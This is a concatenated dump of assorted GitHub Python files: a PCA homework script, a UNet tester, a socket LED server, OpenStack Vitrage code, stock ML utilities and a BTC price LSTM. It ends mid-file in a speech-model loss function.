#print(\"UNIT:\"+temp_unit)\r\n","repo_name":"hhchung/Weather_Report--python","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":7096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10872825511","text":"import urllib.request\r\nimport numpy as np\r\nimport math\r\nimport matplotlib\r\nimport matplotlib.pyplot as plt\r\n\r\nfrom numpy.linalg import linalg\r\n\r\nmy_url = \"https://www.cs.purdue.edu/homes/ribeirob/courses/Fall2017/data/airpollution.csv\"\r\n\r\nheader_line = True\r\n\r\ndata = []\r\n\r\nlocal_filename, headers = urllib.request.urlretrieve(my_url)\r\nwith open(local_filename) as in_file:\r\n for line in in_file.readlines():\r\n if not header_line:\r\n newLine = line.split(',')\r\n data.append(newLine[2:8])\r\n else:\r\n header_line = False\r\n# print(data)\r\nX = np.array(data, dtype=float)\r\n\r\n\r\nm_j = []\r\n\r\nfor i in range(6):\r\n temp = 1/41 * sum(X[:, i])\r\n m_j.append(temp)\r\n\r\n# print(m_j)\r\n\r\nstd_hat_j = []\r\n\r\ntemp = 0\r\nfor j in range(6):\r\n for i in range(41):\r\n temp += math.pow(X[i, j] - m_j[j], 2)\r\n temp = math.sqrt(temp * (1/41))\r\n std_hat_j.append(temp)\r\n temp = 0\r\n\r\nX_prime = np.zeros((41, 6), dtype=float)\r\n\r\nfor j in range(6):\r\n for i in range(41):\r\n X_prime[i, j] = (X[i, j] - m_j[j])/std_hat_j[j]\r\n\r\nS = np.zeros((6, 6), dtype=float)\r\n\r\nfor i in range(41):\r\n S += 1/41 * np.outer(X_prime[i], np.transpose(X_prime[i]))\r\n\r\n\r\n# eig_values = linalg.eigvals(S)\r\neig_values, eig_vectors = linalg.eig(S)\r\n\r\n# print(eig_vectors)\r\nfor i in range(6):\r\n eig_values[i] = math.fabs(eig_values[i])\r\n\r\nsorted_eig_values = sorted(eig_values, reverse=True)\r\nprint(\"Q2) a)\")\r\nfor i in range(6):\r\n print(sorted_eig_values[i])\r\n\r\n\r\nfig = plt.figure(figsize=(8, 5))\r\n\r\nsum_per_column_x_prime = []\r\n\r\nfor i in range(6):\r\n temporary = sum(S[:, i])\r\n sum_per_column_x_prime.append(temporary)\r\n\r\n\r\nvals = np.arange(len(eig_values))+1\r\nplt.plot(vals, eig_values, 'ro-', linewidth=3)\r\nplt.title(\"Scree plot\")\r\nplt.xlabel(\"Range\")\r\nplt.ylabel(\"Eig Values\")\r\nplt.savefig('ScreePlot.png')\r\nplt.close()\r\n\r\nU = np.zeros((6, 2), dtype=float)\r\n\r\nfor i in range(6):\r\n U[i, 0] = eig_vectors[i][0]\r\n U[i, 1] = eig_vectors[i][1]\r\n\r\n# print(U)\r\n\r\nX_new = np.matmul(X_prime, U)\r\n# print(X_new)\r\nplt.title('Scatter plot for X_new')\r\nplt.scatter(X_new[:, 0], X_new[:, 1])\r\nplt.savefig('ScatterPlotX_new.png')\r\nplt.close()\r\n\r\n\r\n","repo_name":"HarshPatel682/Data_Mining_Course","sub_path":"Homework2/hw2-2.py","file_name":"hw2-2.py","file_ext":"py","file_size_in_byte":2179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74451754114","text":"import logging\n\nimport numpy as np\nimport torch\nfrom matplotlib import pyplot as plt\nfrom utils.dataset import SegDataset\nfrom torch.utils.data.sampler import WeightedRandomSampler\nfrom torch.utils.data import DataLoader\nfrom unet.model import UNet\nfrom evaluate import evaluate\n\n\nclass TestModel:\n\n def __init__(self, model_path, dataset: SegDataset):\n\n if dataset.n_classes > 1:\n raise NotImplementedError\n\n self.net = UNet(n_channels=3, n_classes=dataset.n_classes)\n self.dataset = dataset\n\n self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n logging.info(f'Loading model {model_path}')\n logging.info(f'Using device {self.device}')\n\n self.net.to(device=self.device)\n self.net.load_state_dict(torch.load(model_path, map_location=self.device))\n\n logging.info('Model loaded!')\n\n self.net.eval()\n\n def predict_by_idx(self, idx, threshold=None):\n sample = self.dataset[idx]\n img = sample['image']\n mask = sample['mask']\n np_img = img.permute(1, 2, 0).numpy()\n np_mask = mask.permute(1, 2, 0).numpy()\n\n with torch.no_grad():\n output = self.net(torch.unsqueeze(img, 0).to(self.device))\n\n if self.net.n_classes == 1:\n probs = torch.sigmoid(output)[0]\n else:\n raise NotImplementedError\n\n pred_mask = probs.cpu().permute(1, 2, 0).numpy()\n if threshold is not None:\n pred_mask = pred_mask > threshold\n\n return np_img, np_mask, pred_mask\n\n def show_predict_by_idx(self, idx, threshold=None):\n img, markup, predict = self.predict_by_idx(idx, threshold)\n\n plt.title('Image')\n plt.imshow(img/img.max())\n plt.show()\n\n plt.title('Markup')\n plt.imshow(markup)\n plt.show()\n\n plt.title(f'Predict. Threshold: {threshold}')\n plt.imshow(predict)\n plt.show()\n\n def evaluate(self, n_samples, batch_size=8, random_state=0):\n sampler = WeightedRandomSampler(weights=self.dataset.weights,\n num_samples=n_samples, replacement=False,\n generator=torch.Generator().manual_seed(random_state))\n frozen_set = list(sampler)\n loader = DataLoader(self.dataset, sampler=frozen_set,\n batch_size=batch_size, num_workers=4,\n pin_memory=True)\n score = evaluate(self.net, loader, self.device)\n return score.cpu().item()\n\n\nif __name__ == '__main__':\n model_path = '/net/ml4/home/ac/git/seg/checkpoints/checkpoint_epoch48.pth'\n\n bundle_path = './data/c_bundle_hs_128_256.h5'\n\n markup_mapping = {\n 'human_step': 'human__step',\n 'human__step': 'human__step',\n }\n\n test_dataset = SegDataset(group_name='test', bundle_path=bundle_path,\n markup_mapping=markup_mapping, filter_id=13)\n\n test_model = TestModel(model_path, test_dataset)\n","repo_name":"aechernenko/seg","sub_path":"testing.py","file_name":"testing.py","file_ext":"py","file_size_in_byte":3052,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"23641572371","text":"import sys\r\nimport urllib2\r\nimport json\r\nfrom time import sleep\r\n\r\nfin = open( 'B-small-attempt0.in', 'r')\r\nfout = open( 'b.out', 'w')\r\n\r\ncases = fin.readline()\r\nnList = []\r\n\r\nfor i in range( 0, 31):\r\n k = i / 3\r\n #print k\r\n if i % 3 == 0:\r\n nList.append( [k,k,k])\r\n elif i % 3 == 1:\r\n nList.append( [k,k,k+1])\r\n elif i % 3 == 2:\r\n nList.append( [k,k+1,k+1])\r\n\r\nfor i in range( int(cases)):\r\n line = fin.readline()\r\n para = line.split(' ')\r\n N = para[0]\r\n S = int(para[1])\r\n P = int(para[2])\r\n t = []\r\n r = []\r\n cnt = 0\r\n for j in range( 0, int(N)):\r\n t.append( nList[int(para[j+3])])\r\n \r\n for j in t:\r\n if j[2] >= P or j[1] >=P:\r\n cnt = cnt + 1\r\n elif j[2] == P-1 and j[2]-1 >= 0 and j[1]-1 >= 0 and j[1] ==P-1 and S > 0:\r\n cnt = cnt + 1\r\n S = S - 1\r\n if S == 0:\r\n break\r\n fout.write( \"Case #\" + str(i+1) + \": \" + str(cnt) + '\\n')\r\n \r\nfout.close()\r\nfin.close()\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_96/783.py","file_name":"783.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73987370114","text":"# coding: utf-8\r\n#\r\n# AtHomeSocketServer\r\n# Copyright © 2016, 2018 Dave Hocker (email: AtHomeX10@gmail.com)\r\n#\r\n# This program is free software: you can redistribute it and/or modify\r\n# it under the terms of the GNU General Public License as published by\r\n# the Free Software Foundation, version 3 of the License.\r\n#\r\n# See the LICENSE file for more details.\r\n#\r\n\r\n\r\nimport sys\r\ntry:\r\n import socketserver as socketserver\r\nexcept ImportError:\r\n import SocketServer as socketserver\r\nfrom struct import unpack\r\n\r\n\r\nclass TCPRequestHandler(socketserver.BaseRequestHandler):\r\n \"\"\"\r\n The RequestHandler class for our server.\r\n\r\n It is instantiated once per connection to the server, and must\r\n override the handle() method to implement communication to the\r\n client.\r\n \"\"\"\r\n\r\n call_sequence = 1\r\n\r\n # The command_handler_class is injected by the user of this class\r\n # See dmx_client.py for an example implementation.\r\n command_handler_class = None\r\n\r\n # Default size of a complete LED data frame for 50 pixels\r\n frame_size = 8 + (50 * 4)\r\n\r\n @classmethod\r\n def set_frame_size(cls, frame_size):\r\n \"\"\"\r\n Complete LED data frame size injection\r\n :param frame_size:\r\n :return:\r\n \"\"\"\r\n cls.frame_size = frame_size\r\n\r\n @classmethod\r\n def set_command_handler_class(cls, command_handler_to_use, connection_time_out=-1):\r\n \"\"\"\r\n Command handler injection\r\n :param command_handler_to_use: A class that implements a\r\n Response class and an execute_command method.\r\n :param connection_time_out:\r\n :return:\r\n \"\"\"\r\n cls.command_handler_class = command_handler_to_use\r\n cls.connection_time_out = connection_time_out\r\n\r\n \"\"\"\r\n This handler uses raw data from the SocketServer.TCPServer class.\r\n \"\"\"\r\n\r\n def handle(self):\r\n print(\"Connection from {0}\".format(self.client_address[0]))\r\n\r\n # Do until close is received\r\n connection_open = True\r\n while connection_open:\r\n # self.request is the TCP socket connected to the client\r\n led_data = self.read_led_data()\r\n\r\n if led_data and len(led_data) > 0:\r\n try:\r\n # The command handler generates the response\r\n if TCPRequestHandler.command_handler_class:\r\n # Create an instance of the command handler\r\n handler = TCPRequestHandler.command_handler_class()\r\n # Pass the command string to the command handler\r\n response = handler.execute_command(self.request.getsockname()[1], led_data)\r\n except Exception as ex:\r\n print(\"Exception occurred while handling LED data\")\r\n print(str(ex))\r\n print(led_data)\r\n finally:\r\n pass\r\n\r\n TCPRequestHandler.call_sequence += 1\r\n else:\r\n # We consider this an error, so we force close the socket\r\n connection_open = False\r\n print(\"Connection closed\")\r\n\r\n def read_led_data(self):\r\n \"\"\"\r\n Read a stream of LED data from a socket\r\n :return: Returns a list of bytes or None\r\n \"\"\"\r\n # This is essentially APA102 format.\r\n # client_frame_size followed by\r\n # 4 bytes all zeroes header + 4 bytes per pixel * pixels + 4 bytes all ones trailer\r\n client_frame_size = self.receive(4)\r\n if not client_frame_size:\r\n print(\"Unable to read client frame size\")\r\n return None\r\n # Note that the result of unpack is a tuple with one value\r\n client_frame_size = unpack('!i', client_frame_size)[0]\r\n if client_frame_size != TCPRequestHandler.frame_size:\r\n print(\"Client frame size does not match configured number of pixels\")\r\n return None\r\n\r\n led_data = self.receive(TCPRequestHandler.frame_size)\r\n if not led_data:\r\n print(\"Failed to receive complete frame\")\r\n return None\r\n\r\n # It is likely that some sort of data conversion will be required.\r\n # For now we'll coerce the frame into a list of bytes (which\r\n # should be the format it is already in)\r\n led_data = bytes(led_data)\r\n return led_data\r\n\r\n def receive(self, block_size):\r\n \"\"\"\r\n Read a given number of bytes from stream\r\n :param block_size:\r\n :return:\r\n \"\"\"\r\n count = block_size\r\n led_data = b''\r\n # Read exactly \"count\" bytes\r\n while count:\r\n seg = self.request.recv(count)\r\n if seg:\r\n led_data += seg\r\n count -= len(seg)\r\n else:\r\n # Broken socket\r\n return None\r\n # It is likely that some sort of data conversion will be required.\r\n # For now we'll coerce the frame into a list of bytes (which\r\n # should be the format it is already in)\r\n led_data = bytes(led_data)\r\n return led_data\r\n","repo_name":"dhocker/led-emulator","sub_path":"ledsocketserver/TCPRequestHandler.py","file_name":"TCPRequestHandler.py","file_ext":"py","file_size_in_byte":5126,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"75044537794","text":"print ('Suma de los numeros pares')\r\nlista = [20]\r\nnumlista=0\r\nsumador=0\r\nfor x in range (1,41):\r\n if x%2==0:\r\n lista.insert(numlista,x)\r\n numlista+=1\r\nfor y in range (0,20):\r\n print (lista[y])\r\n sumador=lista[y]+sumador\r\n\r\nprint('La suma del arreglo es ',sumador)\r\ninput()\r\n","repo_name":"CamiloRozoP/Python-Fundamentals","sub_path":"Ejercicio#a18.py","file_name":"Ejercicio#a18.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"24898431707","text":"import threading\nimport time\n\nfrom oslo_log import log\nimport oslo_messaging\n\nfrom vitrage.common.constants import DatasourceAction\nfrom vitrage.common.utils import spawn\nfrom vitrage.entity_graph import datasource_rpc as ds_rpc\nfrom vitrage.entity_graph import EVALUATOR_TOPIC\nfrom vitrage.entity_graph.processor.processor import Processor\nfrom vitrage.entity_graph.scheduler import Scheduler\nfrom vitrage.entity_graph.workers import GraphWorkersManager\nfrom vitrage import messaging\n\nLOG = log.getLogger(__name__)\n\n\nclass VitrageGraphInit(object):\n def __init__(self, conf, graph, db_connection):\n self.conf = conf\n self.graph = graph\n self.db = db_connection\n self.workers = GraphWorkersManager(conf, graph, db_connection)\n self.events_coordination = EventsCoordination(\n conf,\n self.process_event,\n conf.datasources.notification_topic_collector,\n EVALUATOR_TOPIC)\n self.scheduler = Scheduler(conf, graph, self.events_coordination)\n self.processor = Processor(conf, graph, self.scheduler.graph_persistor)\n\n def run(self):\n LOG.info('Init Started')\n LOG.info('clearing database active_actions')\n self.db.active_actions.delete()\n ds_rpc.get_all(\n ds_rpc.create_rpc_client_instance(self.conf),\n self.events_coordination,\n self.conf.datasources.types,\n action=DatasourceAction.INIT_SNAPSHOT,\n retry_on_fault=True,\n first_call_timeout=10)\n self.processor.start_notifier()\n spawn(self.start_all_workers)\n self.workers.run()\n\n def start_all_workers(self):\n self.workers.submit_start_evaluations() # evaluate entire graph\n self.graph.subscribe(self.workers.submit_graph_update)\n self.scheduler.start_periodic_tasks()\n LOG.info('Init Finished')\n self.events_coordination.start()\n\n def process_event(self, event):\n if event.get('template_action'):\n self.workers.submit_template_event(event)\n self.workers.submit_evaluators_reload_templates()\n else:\n self.processor.process_event(event)\n\n\nPRIORITY_DELAY = 0.05\n\n\nclass EventsCoordination(object):\n def __init__(self, conf, do_work_func, topic_low, topic_high):\n self._conf = conf\n self._lock = threading.Lock()\n self._high_event_finish_time = 0\n\n def do_work(event):\n try:\n return do_work_func(event)\n except Exception:\n LOG.exception('Got Exception for event %s', str(event))\n\n self._do_work_func = do_work\n\n self._low_pri_listener = self._init_listener(\n topic_low, self._do_low_priority_work)\n self._high_pri_listener = self._init_listener(\n topic_high, self._do_high_priority_work)\n\n def start(self):\n LOG.info('Listening on %s', self._high_pri_listener.targets[0].topic)\n LOG.info('Listening on %s', self._low_pri_listener.targets[0].topic)\n self._high_pri_listener.start()\n self._low_pri_listener.start()\n\n def stop(self):\n self._low_pri_listener.stop()\n self._high_pri_listener.stop()\n\n def wait(self):\n self._low_pri_listener.wait()\n self._high_pri_listener.wait()\n\n def _do_high_priority_work(self, event):\n self._lock.acquire()\n self._do_work_func(event)\n self._high_event_finish_time = time.time()\n self._lock.release()\n\n def _do_low_priority_work(self, event):\n while True:\n self._lock.acquire()\n if (time.time() - self._high_event_finish_time) < PRIORITY_DELAY:\n self._lock.release()\n time.sleep(PRIORITY_DELAY)\n else:\n break\n self._do_work_func(event)\n self._lock.release()\n\n def handle_multiple_low_priority(self, events):\n for e in events:\n self._do_low_priority_work(e)\n\n def _init_listener(self, topic, callback):\n if not topic:\n return\n return messaging.get_notification_listener(\n transport=messaging.get_transport(self._conf),\n targets=[oslo_messaging.Target(topic=topic)],\n endpoints=[PushNotificationsEndpoint(callback)])\n\n\nclass PushNotificationsEndpoint(object):\n def __init__(self, process_event_callback):\n self.process_event_callback = process_event_callback\n\n def info(self, ctxt, publisher_id, event_type, payload, metadata):\n try:\n self.process_event_callback(payload)\n except Exception:\n LOG.exception('Failed to process event callback.')\n","repo_name":"HoonMinJeongUm/Hoonmin-vitrage","sub_path":"vitrage/entity_graph/graph_init.py","file_name":"graph_init.py","file_ext":"py","file_size_in_byte":4671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70151651715","text":"# -*- coding: utf-8 -*-\n# @Author: JinZhang\n# @Date: 2018-03-22 13:06:26\n# @Last Modified by: JinZhang\n# @Last Modified time: 2018-03-23 13:09:51\n\nimport _global as _GG;\n\nimport init as Init;\n\nclass Loader:\n\tdef __init__(self):\n\t\tRunner = Init.Loader();\n\t\t_GG.setG(\"test99\", [1,11,9]);\n\t\tRunner.run();\n\n\nif __name__ == \"__main__\":\n\t_GG.setG(\"test1\", 999);\n\tLoader()","repo_name":"JDreamHeart/DailyCodes","sub_path":"python/全局变量/_load.py","file_name":"_load.py","file_ext":"py","file_size_in_byte":369,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"16923945535","text":"from sklearn import linear_model\nfrom statsmodels.tsa import stattools\nimport statsmodels.api as sm\n\nfrom .DyStockDataUtility import *\n\n\nclass DyStockDataML(object):\n \"\"\" 股票数据的机器学习类 \"\"\"\n \n def predictReboundVol(df, w=4):\n \"\"\"\n amount = rebound increase pct + previous decrease pct\n \"\"\"\n extremas, peaks, bottoms = DyStockDataUtility.swings(df, w=w)\n\n # price of swings\n peakPrices = df.ix[peaks.index, 'high']\n peakPrices.name = 'price'\n\n bottomPrices = df.ix[bottoms.index, 'low']\n bottomPrices.name = 'price'\n\n swingPrices = pd.concat([peakPrices, bottomPrices])\n swingPrices = swingPrices.sort_index()\n\n # decrease and increase of point\n swingPricesPct = swingPrices.pct_change()*100\n\n bottomDescrease = swingPricesPct\n bottomDescrease.name = 'decrease'\n\n bottomIncrease = swingPricesPct.shift(-1)\n bottomIncrease.name = 'increase'\n\n # bottom equation\n bottomDescrease = bottomDescrease.ix[bottoms.index]\n bottomIncrease = bottomIncrease.ix[bottoms.index]\n bottomAmount = df.ix[bottoms.index, 'amt']\n bottomAmount.name = 'amount'\n\n bottomEquation = pd.concat([bottomAmount, bottomDescrease, bottomIncrease], axis=1)\n bottomEquation.dropna(inplace=True)\n\n # 线性回归\n regr = linear_model.LinearRegression()\n regr.fit(bottomEquation[['decrease', 'increase']], bottomEquation['amount'])\n\n # predict\n predictOutcome = regr.predict([[-7, 3]])\n\n return predictOutcome\n\n def adfTest(s):\n \"\"\"\n ADF Test\n p值越大:随机漫步,可能是趋势\n p值越小:均值回归\n \"\"\"\n result = stattools.adfuller(s, 1)\n\n return result[1]\n\n def trendChannel(df, w=4):\n \"\"\"\n 生成趋势通道\n \"\"\"\n def _ols(Y, X):\n X = sm.add_constant(X)\n results = sm.OLS(Y, X).fit()\n intercept, slope = results.params\n\n return intercept, slope, results.rsquared\n\n # get swing\n extremas, peaks, bottoms = DyStockDataUtility.swings(df, w=w)\n\n # get x-coordinates\n peaksX = [extremas.index.get_loc(i) for i in peaks.index]\n\n # find the best trend channel\n if len(extremas) < 6:\n return None, None\n\n # from time latest to oldest\n xRange = list(range(len(extremas)))\n i = -6\n trendChannelUp, trendChannelDown = None, None # [intercept, slope]\n trendChannelUpX, trendChannelDownX = None, None\n while i > -len(extremas):\n peaksX_, bottomsX_ = [], []\n for x in xRange[i:]:\n if x in peaksX:\n peaksX_.append(x)\n else:\n bottomsX_.append(x)\n\n # 线性回归, Y = aX + b\n interceptPeak, slopePeak, rSquaredPeak = _ols(extremas.values[peaksX_], np.array(peaksX_))\n interceptBottom, slopeBottom, rSquaredBottom = _ols(extremas.values[bottomsX_], np.array(bottomsX_))\n\n if rSquaredPeak >= 0.8**2 and rSquaredBottom >= 0.8**2:\n if trendChannelUp is None or \\\n abs(slopePeak - slopeBottom) <= abs(trendChannelUp[1] - trendChannelDown[1]): # 上下轨越平行越好\n trendChannelUp = [interceptPeak, slopePeak]\n trendChannelDown = [interceptBottom, slopeBottom]\n\n trendChannelUpX, trendChannelDownX = peaksX_, bottomsX_\n\n i -= 2 # one peak and bottom\n\n if trendChannelUp is None:\n return None, None\n\n # get 2 points each trend channel up line and down line by regression line\n # up of channel\n trendChannelUp1Time = extremas.index[trendChannelUpX[0]]\n trendChannelUp1Price = trendChannelUp[1]*trendChannelUpX[0] + trendChannelUp[0]\n\n trendChannelUp2Time = extremas.index[trendChannelUpX[-1]]\n trendChannelUp2Price = trendChannelUp[1]*trendChannelUpX[-1] + trendChannelUp[0]\n\n trendChannelUpS = pd.Series([trendChannelUp1Price, trendChannelUp2Price], index=[trendChannelUp1Time, trendChannelUp2Time])\n\n # down of channel\n trendChannelDown1Time = extremas.index[trendChannelDownX[0]]\n trendChannelDown1Price = trendChannelDown[1]*trendChannelDownX[0] + trendChannelDown[0]\n\n trendChannelDown2Time = extremas.index[trendChannelDownX[-1]]\n trendChannelDown2Price = trendChannelDown[1]*trendChannelDownX[-1] + trendChannelDown[0]\n\n trendChannelDownS = pd.Series([trendChannelDown1Price, trendChannelDown2Price], index=[trendChannelDown1Time, trendChannelDown2Time])\n\n return trendChannelUpS, trendChannelDownS","repo_name":"MicroEngine/DevilYuan","sub_path":"Stock/Data/Utility/DyStockDataML.py","file_name":"DyStockDataML.py","file_ext":"py","file_size_in_byte":4799,"program_lang":"python","lang":"en","doc_type":"code","stars":222,"dataset":"github-code","pt":"61"} +{"seq_id":"13350797084","text":"import sys\nsys.path.insert(1,\"../../\")\nimport h2o\nfrom tests import pyunit_utils\nfrom h2o.estimators.gbm import H2OGradientBoostingEstimator\n\ndef partial_plot_row_index():\n data = h2o.import_file(pyunit_utils.locate('smalldata/prostate/prostate_cat_NA.csv'))\n x = data.names\n y = 'CAPSULE'\n x.remove(y)\n\n # Build a GBM model predicting for response CAPSULE\n gbm_model = H2OGradientBoostingEstimator(ntrees=50, learn_rate=0.05, seed=12345)\n gbm_model.train(x=x, y=y, training_frame=data)\n\n # Generate Partial Dependence for row index -1 and row index 0, they should differ\n pdp = gbm_model.partial_plot(frame=data, cols=['RACE'], plot=False, plot_stddev=False, row_index=-1)\n pdp0 = gbm_model.partial_plot(frame=data, cols=['RACE'], plot=False, plot_stddev=False, row_index=0)\n assert not(pyunit_utils.equal_two_arrays(pdp[0][1], pdp0[0][1], throw_error=False))\n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(partial_plot_row_index)\nelse:\n partial_plot_row_index()\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_jira/pyunit_pubdev_7705.py","file_name":"pyunit_pubdev_7705.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"16894525074","text":"#!/usr/bin/env python3\r\n\r\nimport pandas as pd\r\nimport numpy\r\nimport matplotlib.pyplot as plt\r\nimport tensorflow as tf\r\n\r\nnumpy.random.seed(10)\r\n\r\ndataframe = pd.read_csv('./processed_data/btcusdcomplete.csv', parse_dates=['time_close'])\r\ndataframe['time_close'] = pd.to_datetime(dataframe['time_close'], unit='s')\r\ndataframe = dataframe.set_index('time_close')\r\n\r\n#* convert an array of values into a dataset matrix\r\ndef create_dataset(dataset, look_back=1):\r\n\tdataX, dataY = [], []\r\n\tfor i in range(len(dataset)-look_back-1):\r\n\t\ta = dataset[i:(i+look_back)]\r\n\t\tdataX.append(a)\r\n\t\tdataY.append(dataset[i + look_back])\r\n\treturn (numpy.array(dataX), numpy.array(dataY))\r\n\r\n\r\n#* load the dataset\r\ndataset = dataframe['rate_close']\r\ndataset = dataset.astype('float32')\r\n#* dataset = dataset[-4380:]\r\n\r\n#* split into training, validation and testing sets in 70, 20 and 10 percents respectively\r\ntrain_size = int(len(dataset)*0.70)\r\nvalid_size = int(len(dataset)*0.20)\r\ntrain = dataset[:train_size]\r\nvalid = dataset[train_size:train_size+valid_size]\r\ntest = dataset[train_size+valid_size:]\r\n\r\n#* reshape datasets\r\nlook_back = 72\r\ntrainX, trainY = create_dataset(train, look_back=look_back)\r\nvalidX, validY = create_dataset(valid, look_back=look_back)\r\ntestX, testY = create_dataset(test, look_back=look_back)\r\n\r\n# *creating callbacks to save model\r\n# cp_callback = tf.keras.callbacks.ModelCheckpoint(filepath='./eth-model/',\r\n# save_weights_only=True,\r\n# verbose=1)\r\nprint(f'{trainX.shape} {trainY.shape}')\r\n#* model creation and fitting\r\nmodel = tf.keras.Sequential([\r\n\ttf.keras.layers.LSTM(24, input_shape=(look_back, 1),\r\n\t activation=tf.nn.relu, return_sequences=True),\r\n\ttf.keras.layers.Bidirectional(\r\n\t\ttf.keras.layers.LSTM(12, activation=tf.nn.relu)),\r\n\ttf.keras.layers.Flatten(),\r\n\ttf.keras.layers.Dense(1),\r\n])\r\n\r\nmodel.compile(loss=tf.keras.losses.MeanSquaredError(),\r\n optimizer=tf.keras.optimizers.Adam())\r\n\r\nmodel.fit(trainX, trainY, epochs=15, batch_size=5,\r\n verbose=2, validation_data=(validX, validY))\r\n\r\n# model.save_weights('./btc-weights/')\r\n\r\n#* generate predictions for training\r\ntrainPredict = model.predict(trainX)\r\nvalidPredict = model.predict(validX)\r\ntestPredict = model.predict(testX)\r\n\r\n#* shift train predictions for plotting\r\ntrainPredictPlot = numpy.empty_like(dataset)\r\ntrainPredictPlot[:] = numpy.nan\r\ntrainPredictPlot[look_back:len(\r\n\ttrainPredict)+look_back] = numpy.squeeze(trainPredict)\r\n\r\n#* shift valid predictions for plotting\r\nvalidPredictPlot = numpy.empty_like(dataset)\r\nvalidPredictPlot[:] = numpy.nan\r\nvalidPredictPlot[len(trainPredict)+look_back:len(trainPredict) +\r\n valid_size-1] = numpy.squeeze(validPredict)\r\n\r\n#* shift test predictions for plotting\r\ntestPredictPlot = numpy.empty_like(dataset)\r\ntestPredictPlot[:] = numpy.nan\r\ntestPredictPlot[len(trainPredict)+valid_size+(look_back*2) +\r\n 1:len(dataset)-1] = numpy.squeeze(testPredict)\r\n\r\nplt.plot(dataframe.index.values, dataframe['rate_close'], 'r-', label='Real')\r\nplt.plot(dataframe.index.values, trainPredictPlot,\r\n color='green', label='Training Predictions')\r\nplt.plot(dataframe.index.values, validPredictPlot,\r\n color='blue', label='Validation Predictions')\r\nplt.plot(dataframe.index.values, testPredictPlot,\r\n color='orange', label='Testing Predictions')\r\nplt.xlabel('Date')\r\nplt.ylabel('Values')\r\nplt.title('Results')\r\nplt.legend()\r\nplt.show()","repo_name":"diysumit/Major-Project-471-445-429-427","sub_path":"data/predict_data.py","file_name":"predict_data.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"34152058731","text":"import torch\nfrom torch import nn\nfrom torch.nn import functional as F\nfrom .utils import get_mask_from_lengths\n\nclass ParrotLoss(nn.Module):\n def __init__(self, hparams):\n super(ParrotLoss, self).__init__()\n self.hidden_dim = hparams.encoder_embedding_dim\n self.ce_loss = hparams.ce_loss\n\n self.L1Loss = nn.L1Loss(reduction='none')\n self.MSELoss = nn.MSELoss(reduction='none')\n self.BCEWithLogitsLoss = nn.BCEWithLogitsLoss(reduction='none')\n self.CrossEntropyLoss = nn.CrossEntropyLoss(reduction='none')\n self.n_frames_per_step = hparams.n_frames_per_step_decoder\n self.eos = hparams.n_symbols\n self.predict_spectrogram = hparams.predict_spectrogram\n\n self.contr_w = hparams.contrastive_loss_w\n self.spenc_w = hparams.speaker_encoder_loss_w\n self.texcl_w = hparams.text_classifier_loss_w\n self.spadv_w = hparams.speaker_adversial_loss_w\n self.spcla_w = hparams.speaker_classifier_loss_w\n\n def parse_targets(self, targets, text_lengths):\n '''\n text_target [batch_size, text_len]\n mel_target [batch_size, mel_bins, T]\n spc_target [batch_size, spc_bins, T]\n speaker_target [batch_size]\n stop_target [batch_size, T]\n '''\n text_target, mel_target, spc_target, speaker_target, stop_target = targets\n\n B = stop_target.size(0)\n stop_target = stop_target.reshape(B, -1, self.n_frames_per_step)\n stop_target = stop_target[:, :, 0]\n\n padded = torch.tensor(text_target.data.new(B,1).zero_())\n text_target = torch.cat((text_target, padded), dim=-1)\n \n # adding the ending token for target\n for bid in range(B):\n text_target[bid, text_lengths[bid].item()] = self.eos\n\n return text_target, mel_target, spc_target, speaker_target, stop_target\n \n def forward(self, model_outputs, targets, input_text, eps=1e-5):\n\n '''\n predicted_mel [batch_size, mel_bins, T]\n predicted_stop [batch_size, T/r]\n alignment \n when input_text==True [batch_size, T/r, max_text_len] \n when input_text==False [batch_size, T/r, T/r]\n text_hidden [B, max_text_len, hidden_dim]\n mel_hidden [B, max_text_len, hidden_dim]\n text_logit_from_mel_hidden [B, max_text_len+1, n_symbols+1]\n speaker_logit_from_mel [B, n_speakers]\n speaker_logit_from_mel_hidden [B, max_text_len, n_speakers]\n text_lengths [B,]\n mel_lengths [B,]\n '''\n predicted_mel, post_output, predicted_stop, alignments,\\\n text_hidden, mel_hidden, text_logit_from_mel_hidden, \\\n audio_seq2seq_alignments, \\\n speaker_logit_from_mel, speaker_logit_from_mel_hidden, \\\n text_lengths, mel_lengths = model_outputs\n\n text_target, mel_target, spc_target, speaker_target, stop_target = self.parse_targets(targets, text_lengths)\n\n ## get masks ##\n mel_mask = get_mask_from_lengths(mel_lengths, mel_target.size(2)).unsqueeze(1).expand(-1, mel_target.size(1), -1).float()\n spc_mask = get_mask_from_lengths(mel_lengths, mel_target.size(2)).unsqueeze(1).expand(-1, spc_target.size(1), -1).float()\n\n mel_step_lengths = torch.ceil(mel_lengths.float() / self.n_frames_per_step).long()\n stop_mask = get_mask_from_lengths(mel_step_lengths, \n int(mel_target.size(2)/self.n_frames_per_step)).float() # [B, T/r]\n text_mask = get_mask_from_lengths(text_lengths).float()\n text_mask_plus_one = get_mask_from_lengths(text_lengths + 1).float()\n\n # reconstruction loss #\n recon_loss = torch.sum(self.L1Loss(predicted_mel, mel_target) * 